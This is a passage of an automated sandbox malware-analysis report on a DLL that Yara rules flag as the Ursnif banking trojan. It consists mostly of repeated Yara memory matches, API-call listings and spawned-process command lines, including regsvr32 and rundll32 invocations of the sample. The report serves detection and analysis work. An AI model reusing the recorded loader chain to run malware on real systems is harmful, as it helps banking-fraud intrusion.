                      Source: Yara matchFile source: 00000000.00000003.724522780.000000000196B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.636697378.000000000517B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.681026277.0000000004F7F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620184852.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613707607.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.701868957.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612982412.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613851431.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613762692.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6980, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 7000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7012, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7052, type: MEMORYSTR
                      Source: Yara matchFile source: 5.2.rundll32.exe.2b80000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.920000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.a60000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.a80000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.4ea94a0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.9f0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.2bb0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.12994a0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.b40000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.a60000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.4ea94a0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.9e0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.49a94a0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.a40000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.2b80000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.990000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.a50000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.870000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.d80000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.9f0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4d494a0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4d494a0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.49a94a0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.880000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.12994a0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.2b70000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.a90000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.920000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.883888908.0000000004D49000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.879831053.0000000000A50000.00000004.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.879772547.0000000000A40000.00000004.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.884087885.00000000049A9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.881330354.0000000004EA9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.879852238.0000000000B40000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.880442482.0000000001299000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.878853677.0000000000870000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.879036722.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.878927946.0000000000880000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.879010768.00000000009E0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.879009895.0000000000920000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.880994352.0000000002B70000.00000004.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.878979369.0000000000990000.00000004.00000001.sdmp, type: MEMORY

                      E-Banking Fraud:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000002.00000003.620315557.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.884237946.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613835753.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612905346.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612880805.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612995967.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.880807454.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.701819091.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.613174085.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.664565353.000000000513D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620214841.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.702016309.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613794834.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.642767964.000000000523B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.881549232.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620265495.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.635568127.0000000004E5B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620243933.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613948347.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620142786.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.701985470.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.679769381.0000000004C5F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.702307918.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.657340118.0000000004D5D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620475830.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.701915707.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613862631.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613818747.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.884432102.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613737711.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620285363.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.613014620.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612932234.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.658506384.000000000507D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612953290.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620302187.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612852123.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.701957231.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.746687116.000000000186D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.768852725.000000000176F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.686987362.000000000503F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.701777888.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.702038882.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.724522780.000000000196B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.636697378.000000000517B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.681026277.0000000004F7F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620184852.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613707607.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.701868957.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612982412.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613851431.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613762692.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6980, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 7000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7012, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7052, type: MEMORYSTR
                      Source: Yara matchFile source: 5.2.rundll32.exe.2b80000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.920000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.a60000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.a80000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.4ea94a0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.9f0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.2bb0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.12994a0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.b40000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.a60000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.4ea94a0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.9e0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.49a94a0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.a40000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.2b80000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.990000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.a50000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.870000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.d80000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.9f0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4d494a0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4d494a0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.49a94a0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.880000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.12994a0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.2b70000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.a90000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.920000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.883888908.0000000004D49000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.879831053.0000000000A50000.00000004.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.879772547.0000000000A40000.00000004.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.884087885.00000000049A9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.881330354.0000000004EA9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.879852238.0000000000B40000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.880442482.0000000001299000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.878853677.0000000000870000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.879036722.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.878927946.0000000000880000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.879010768.00000000009E0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.879009895.0000000000920000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.880994352.0000000002B70000.00000004.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.878979369.0000000000990000.00000004.00000001.sdmp, type: MEMORY
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_736D6AD0 CryptDecrypt,CryptImportKey,VirtualAlloc,0_2_736D6AD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_736D61F0 DllRegisterServer,VirtualAlloc,VirtualAlloc,CryptSetKeyParam,CryptAcquireContextA,CryptImportKey,CryptDecrypt,CryptReleaseContext,CryptDestroyKey,CryptImportKey,CryptDecrypt,VirtualAlloc,VirtualAlloc,0_2_736D61F0
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_736D6AD0 CryptDecrypt,CryptImportKey,VirtualAlloc,2_2_736D6AD0
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_736D61F0 DllRegisterServer,VirtualAlloc,VirtualAlloc,CryptSetKeyParam,CryptAcquireContextA,CryptImportKey,CryptDecrypt,CryptReleaseContext,CryptDestroyKey,CryptImportKey,CryptDecrypt,VirtualAlloc,VirtualAlloc,2_2_736D61F0

                      System Summary:

                      barindex
                      Writes or reads registry keys via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Writes registry values via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: WTXuYxax6d.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_736D67600_2_736D6760
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_736D5BB00_2_736D5BB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_736E05D30_2_736E05D3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_736D48B00_2_736D48B0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_736D489D0_2_736D489D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00A8E8A80_2_00A8E8A8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00A830890_2_00A83089
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00A8E8FB0_2_00A8E8FB
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00A8AF140_2_00A8AF14
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00A8235B0_2_00A8235B
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_736D67602_2_736D6760
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_736D5BB02_2_736D5BB0
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_736E05D32_2_736E05D3
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_736D48B02_2_736D48B0
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_736D489D2_2_736D489D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A621B43_2_00A621B4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A9E8A83_2_00A9E8A8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A930893_2_00A93089
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A9E8FB3_2_00A9E8FB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A9AF143_2_00A9AF14
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A9235B3_2_00A9235B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02B821B45_2_02B821B4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02BBE8A85_2_02BBE8A8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02BB30895_2_02BB3089
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02BBE8FB5_2_02BBE8FB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02BBAF145_2_02BBAF14
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02BB235B5_2_02BB235B
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 736D82C0 appears 60 times
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 736D82C0 appears 60 times
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00A86307 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,0_2_00A86307
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00A8B139 NtQueryVirtualMemory,0_2_00A8B139
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A6138A NtMapViewOfSection,3_2_00A6138A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A612E2 GetProcAddress,NtCreateSection,memset,3_2_00A612E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A6156C SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,3_2_00A6156C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A623D5 NtQueryVirtualMemory,3_2_00A623D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A96307 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,3_2_00A96307
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00A9B139 NtQueryVirtualMemory,3_2_00A9B139
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02B8138A NtMapViewOfSection,5_2_02B8138A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02B8156C SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,5_2_02B8156C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02B812E2 GetProcAddress,NtCreateSection,memset,5_2_02B812E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02B823D5 NtQueryVirtualMemory,5_2_02B823D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02BB6307 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,5_2_02BB6307
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_02BBB139 NtQueryVirtualMemory,5_2_02BBB139
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: WTXuYxax6d.dllVirustotal: Detection: 18%
                      Source: WTXuYxax6d.dllReversingLabs: Detection: 25%
                      Source: WTXuYxax6d.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\WTXuYxax6d.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\WTXuYxax6d.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\WTXuYxax6d.dll
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\WTXuYxax6d.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\WTXuYxax6d.dll,DllRegisterServer
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:7020 CREDAT:17410 /prefetch:2
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\WTXuYxax6d.dll,azfdnkcrayghb
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\WTXuYxax6d.dll,bngggbakts
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\WTXuYxax6d.dll",#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\WTXuYxax6d.dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exeJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\WTXuYxax6d.dll,DllRegisterServerJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\WTXuYxax6d.dll,azfdnkcrayghbJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\WTXuYxax6d.dll,bngggbaktsJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\WTXuYxax6d.dll",#1Jump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:7020 CREDAT:17410 /prefetch:2Jump to behavior
